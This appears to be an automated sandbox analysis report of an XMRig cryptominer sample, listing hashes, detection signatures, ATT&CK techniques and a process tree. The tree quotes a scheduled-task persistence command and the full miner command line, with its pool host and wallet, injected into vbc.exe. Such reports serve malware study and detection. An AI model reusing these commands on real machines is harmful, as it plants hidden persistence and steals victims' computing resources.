xmrig | 8062eb6eea56d33e35ea32f6eef98636bbd66c2d177c1889c4f0a960b0d14d47

General

Target

9b3430f42a0fb00d014c2fa208662865.exe
Size

4.8MB
MD5

9b3430f42a0fb00d014c2fa208662865
SHA1

09a16508bcc0a6da90c272daa2eff627ccd3205d
SHA256

8062eb6eea56d33e35ea32f6eef98636bbd66c2d177c1889c4f0a960b0d14d47
SHA512

d2887d08a66e10af1e89fb60f2a4f8d7bae7dc5cccc0301a70cb5ff120094c5e6247b44cf3b1b2b1c7e5d48e687319b842a721d757ebb44cf484ef766db92e29
SSDEEP

98304:CdlaF/1RByjAQG/Mul2rq/aReDkizMeQUh:CdYvkji/Mul2rVe4iwVUh

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/852-34-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/852-37-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/852-38-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/852-39-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/852-40-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/852-41-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/852-42-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/852-43-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/852-46-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 5 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/3052-0-0x00000000012A0000-0x000000000177A000-memory.dmp	net_reactor
behavioral1/memory/2768-19-0x0000000000FB0000-0x000000000148A000-memory.dmp	net_reactor
behavioral1/files/0x000d000000012321-18.dat	net_reactor
behavioral1/files/0x000d000000012321-17.dat	net_reactor
behavioral1/files/0x000d000000012321-15.dat	net_reactor

Executes dropped EXE 1 IoCs

pid	Process
2768	.exe

Loads dropped DLL 1 IoCs

pid	Process
2684	cmd.exe

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/852-26-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-32-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-34-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-37-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-38-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-39-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-40-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-41-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-42-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-43-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/852-46-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2768 set thread context of 852	2768	.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2904	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2740	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2768	.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3052	9b3430f42a0fb00d014c2fa208662865.exe
Token: SeDebugPrivilege	2768	.exe
Token: SeLockMemoryPrivilege	852	vbc.exe
Token: SeLockMemoryPrivilege	852	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
852	vbc.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 2684	3052	9b3430f42a0fb00d014c2fa208662865.exe	30
PID 3052 wrote to memory of 2684	3052	9b3430f42a0fb00d014c2fa208662865.exe	30
PID 3052 wrote to memory of 2684	3052	9b3430f42a0fb00d014c2fa208662865.exe	30
PID 2684 wrote to memory of 2740	2684	cmd.exe	31
PID 2684 wrote to memory of 2740	2684	cmd.exe	31
PID 2684 wrote to memory of 2740	2684	cmd.exe	31
PID 2684 wrote to memory of 2768	2684	cmd.exe	32
PID 2684 wrote to memory of 2768	2684	cmd.exe	32
PID 2684 wrote to memory of 2768	2684	cmd.exe	32
PID 2768 wrote to memory of 2816	2768	.exe	35
PID 2768 wrote to memory of 2816	2768	.exe	35
PID 2768 wrote to memory of 2816	2768	.exe	35
PID 2816 wrote to memory of 2904	2816	cmd.exe	33
PID 2816 wrote to memory of 2904	2816	cmd.exe	33
PID 2816 wrote to memory of 2904	2816	cmd.exe	33
PID 2768 wrote to memory of 852	2768	.exe	36
PID 2768 wrote to memory of 852	2768	.exe	36
PID 2768 wrote to memory of 852	2768	.exe	36
PID 2768 wrote to memory of 852	2768	.exe	36
PID 2768 wrote to memory of 852	2768	.exe	36
PID 2768 wrote to memory of 852	2768	.exe	36
PID 2768 wrote to memory of 852	2768	.exe	36

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exe
"C:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB56.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2740
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2816
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:852

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
1⤵
- Creates scheduled task(s)
PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
375KB

MD5
11b111f89079fce88340abda13d49ce2

SHA1
88ffbb8cb5e30b184dcb5ac46c2db31c57db0031

SHA256
d96218d8185789f23d576dadeb23c65163c9eef97b8f70eb8d1900d09ac7567d

SHA512
7e4af405f8ffd471b8e6661ecae67d5df99f478d221bb2af2ec61be205818043dbee77a55bd0afb443b6de5d8ed833aee78e3ac716f307e0fc50050fe8e18e37

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
282KB

MD5
51d143b1bdbfbb936c2d47673e0fe43c

SHA1
556e61859a7de873d68bb332325b69a1693f20bf

SHA256
582b52d02fb95821ad1c5fe1f3566c13b324f7078b85678ab01c91d9b5a92eb4

SHA512
519b9f286681965cc66b2eab534e87a816bf262699932ab0f08fcca0da239976f403a2c09e30608dc866f21e27cd08722187968318fa4aef29c82a8d768b132f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB56.tmp.bat

Filesize
167B

MD5
271511bcf3824573cab42239e095565d

SHA1
377268f40a9f8ff3b3c45fdb9cb6dcc11266b2fe

SHA256
1119735406f2c635fc60be319d205a10f0503ddd05110adc745fc217827cd90d

SHA512
8a97330facd52295bd20c289124576797916f7973e0b91d27bd94dc629f0ba741b58492d6b867e250aad3c4d77070224b23163fe6386ddb69d9b9840a531b8b5

Download Submit
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
223KB

MD5
2d657841d442f1e035d01456cedc2201

SHA1
664cb7aeaf4058ac75dc807a6db7702bc8d2495a

SHA256
0d12dcace71be0e23dcaec1a9f7e9b2bb4df32072e66ecf2e1b29f910eb9bc95

SHA512
89f517531ad0501202c1ae17dc18bc8b77fc9f4e71dd5601c043defce99ba90f793b7ae23161c6b2057aea22ae1deee9593e58287781da9d47f8da7d44895283

Download Submit
memory/852-28-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

Filesize
4KB

Download
memory/852-40-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-48-0x0000000001D80000-0x0000000001DA0000-memory.dmp

Filesize
128KB

Download
memory/852-47-0x0000000001D60000-0x0000000001D80000-memory.dmp

Filesize
128KB

Download
memory/852-46-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-45-0x0000000001D80000-0x0000000001DA0000-memory.dmp

Filesize
128KB

Download
memory/852-44-0x0000000001D60000-0x0000000001D80000-memory.dmp

Filesize
128KB

Download
memory/852-43-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-42-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-41-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-39-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-25-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-26-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-27-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-38-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-30-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-32-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-37-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-35-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-34-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/852-36-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/2768-33-0x000007FEF4AB0000-0x000007FEF549C000-memory.dmp

Filesize
9.9MB

Download
memory/2768-24-0x000000001C590000-0x000000001C610000-memory.dmp

Filesize
512KB

Download
memory/2768-23-0x000007FEF4AB0000-0x000007FEF549C000-memory.dmp

Filesize
9.9MB

Download
memory/2768-22-0x0000000000540000-0x0000000000541000-memory.dmp

Filesize
4KB

Download
memory/2768-21-0x000000001C590000-0x000000001C610000-memory.dmp

Filesize
512KB

Download
memory/2768-20-0x000007FEF4AB0000-0x000007FEF549C000-memory.dmp

Filesize
9.9MB

Download
memory/2768-19-0x0000000000FB0000-0x000000000148A000-memory.dmp

Filesize
4.9MB

Download
memory/3052-0-0x00000000012A0000-0x000000000177A000-memory.dmp

Filesize
4.9MB

Download
memory/3052-14-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp

Filesize
9.9MB

Download
memory/3052-1-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp

Filesize
9.9MB

Download
memory/3052-2-0x000000001C490000-0x000000001C510000-memory.dmp

Filesize
512KB

Download
memory/3052-3-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads